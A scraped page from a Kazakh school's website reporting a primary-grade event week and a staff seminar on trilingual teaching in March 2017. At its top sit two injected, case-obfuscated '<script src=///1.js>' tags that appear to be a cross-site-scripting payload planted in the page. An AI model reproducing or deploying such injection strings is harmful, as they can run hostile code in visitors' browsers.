<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.03.2017

Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 20.02-02.03.2017 аралығында бастауыш сыныптарының «Ертеңгі болашақ – бүгінгі білімді ұрпақ» атты онкүндігі өткізілді. Бастауыш сыныптың мұғалімдері жоспарға сай өздеріне бекітілген ашық сабақтарын және ашық тәрбие сағаттарын жоғары деңгейде өткізді. Оқушылары сабақтарда өз белсенділіктерін танытты. Онкүндіктің соңында, яғни 01.03.күні мектептің барлық ұстаздарының қатысуымен «Үш тұғырлы тіл – заман талабы» тақырыбымен мектепшілік семинар өткізілді. Ұстаздарды үш топқа бөліп, тақырыпқа сай түрлі де қызықты тапсырмалар орындады. Экраннан бастауыш сынып мұғалімдерінің үштілдікте өткізілген сабақтарынан үзінділер көрсетілді. Семинар соңында ұстаздар өз топтарында «Үштілдікте оқып жүрген оқушылардан болашақта қандай нәтиже күтесіздер?» деген сұрақпен постер қорғады. Бұл тапсырманы ұстаздар өте жоғары деңгейде қорғап шықты. Рефлексия жасап, әр топтан ұстаздар өз пікірлері мен ұсыныстарын ортаға салды. Семинарды білікті маман, бастауыш сынып мұғалімі Варанкин Е.Ю. жүргізді.

Просмотров: 657


Пікір қосу



Деректерді қолтаңбаға қосу